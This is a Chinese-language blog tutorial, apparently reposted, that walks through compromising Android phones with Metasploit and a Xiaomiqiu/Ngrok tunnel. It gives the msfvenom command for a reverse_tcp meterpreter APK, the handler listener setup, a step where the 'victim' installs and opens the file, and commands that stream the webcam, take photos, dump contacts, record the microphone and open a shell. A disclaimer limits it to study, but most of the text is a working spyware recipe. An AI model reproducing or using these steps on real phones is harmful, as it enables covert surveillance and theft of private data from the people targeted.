通過Metasploit+小米球實現內網穿透入侵安卓手機


一. 前言:

嚴正聲明:本文僅限於技術討論與分享,嚴禁用於非法途徑。

實驗目的:演示如何使用Kali里的Metasploit控制安卓手機

內網穿透原理:內網穿透相當於先將數據發給服務器,然后由服務器發給內網中的我們

 

二. 環境准備

注:具體下載和使用方法我就不講了,百度上都有,講起來太長了

1.kali linux(攻擊方)

2.Ngrok(小米球)

下載linux版本並注冊一個帳號來開通一個免費的隧道,用於接下來的端口映射

3.安卓模擬器(因為博主沒有安卓手機,所以用模擬器)

注:比較推薦用模擬器,因為這個漏洞挺久遠的,所以不支持高版本的手機,目前我測試了7.0以上好像是不行的(至少我沒成功,有成功的歡迎來教教我),靶機我用的是版本為5.1的安卓

 

三. 開始實驗

1. 啟動內網穿透工具Ngrok

命令: ./xiaomiqiu_start.sh(在xiaomiqiu文件右擊在此打開終端並輸入此命令)

2.查看kali的ip

命令:ifconfig

3. 用Metasploit生成載有惡意Payload的Android的apk

命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.121.128 lport=8080 R > what.apk

解釋: lhost=192.168.121.128 (這是Kali的IP)lport=8080 (默認4444,可以自定義,這里要與Ngrok的相同)

4. 啟動msfconsole,設置模塊

命令1:msfconsole

命令2:use exploit/multi/handler

5. 設置payload和監聽

set payload android/meterpreter/reverse_tcp //選擇Payload
set lhost 192.168.121.128  //這里的地址設置成我們剛才生成木馬的IP地址
set lport 8080      //這里的端口設置成剛才我們生成木馬所監聽的端口

6. 檢查配置是否正確

命令:options

 

四.攻擊

1. 入侵

命令:exploit或者run

這個時候就監聽就開啟了,然后使用手機安裝剛才生成的病毒文件(拉文件就不用演示了吧)

2. 此時手動點擊剛才手機中安裝的MainActivity程序圖標(沒有界面)

3.當受害者點擊以后便可成功建立攻擊會話

 

五. 攻擊命令

1.開啟攝像頭並錄像

命令:webcam_stream

2.查看手機系統信息

命令:sysinfo

3.導出手機通訊錄

命令:dump_contacts

4.調用攝像頭拍照

命令:webcam_snap

5.錄制聲音

命令: record_mic

6.成功建立攻擊會話后可以對受害者手機進行像Linux主機shell一樣對手機進行命令執行操作

 


至此,本次演示結束,其他一些命令我就不一一演示了,有興趣的話可自行借助help命令或者?給出的使用命令描述進行體驗。

溫馨提示:請不要隨便安裝陌生人的軟件,可能會泄露自己的隱私!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM